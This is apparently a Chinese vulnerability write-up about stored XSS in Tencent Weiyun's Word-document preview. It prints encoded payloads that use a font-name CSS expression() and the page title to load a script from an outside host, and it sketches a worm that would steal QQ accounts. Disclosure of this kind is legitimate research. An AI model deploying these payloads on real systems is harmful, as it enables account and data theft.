腾讯微云存储xss

知道腾讯微云是在qq群里图片预览。<ignore_js_op>
登陆网页版http://www.weiyun.com/disk/index.html
发现能上传word,用的是http://www.yozosoft.com/office/fileconvert.jsp的office预览功能,本次重点测试该预览的过滤效果。
word的内容为xss代码直接被编码,于是测试字体功能
<ignore_js_op>

字体的名字有31字节限制,这个就是利用style 的expression。
发现预览会自动把前170字节的内容作为title,这样把内容设为

[JavaScript] 纯文本查看 复制代码
1
unescape("%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%74%6D%78%6B%2E%6F%72%67%2F%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E")

字体设为

[JavaScript] 纯文本查看 复制代码
1

2
expression(eval(document.title)) //32字节,长度不满足
expression(eval($('title')) // 长度满足,但单引号、双引号被过滤,还是不行

就可以xss了。但利用就在弹框框阶段。

为了利用最大化,我想到了抓包和wps。
我试了wps。wps重写了字体对话框,其复杂文中字体长度则不受限制。
<ignore_js_op>

于是写一个文档,内容为

[JavaScript] 纯文本查看 复制代码
1
%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%74%6D%78%6B%2E%6F%72%67%2F%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E

复杂文中字体设为

[JavaScript] 纯文本查看 复制代码
1
expression(document.write(unescape(document.title)))

上传,在ie等的环境下,测试成功。
<ignore_js_op>
最终测试代码

[JavaScript] 纯文本查看 复制代码
1
expression(document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,47,47,116,109,120,107,46,111,114,103,47,46,106,115,62,60,47,115,99,114,105,112,116,62)))

http://sh7.docview.weiyun.com/docview/13923/c6ee9d055c7af0959a5d8f692a6fdba7/html/c6ee9d055c7af0959a5d8f692a6fdba7.html
http://sh11.docview.weiyun.com/docview/24885/5a214a4eff875a92ead3f3b187a29ba7/html/5a214a4eff875a92ead3f3b187a29ba7.html

这个的利用就是蠕虫,在word文档里添加隐藏的代码,别人转存、预览的时候就会被盗qq号、盗资料等。需要提醒的是excel、ppt等文档的预览,我没有测试,但wps的轻办公已有该漏洞。

标签: 无
返回文章列表 文章二维码
本页链接的二维码
打赏二维码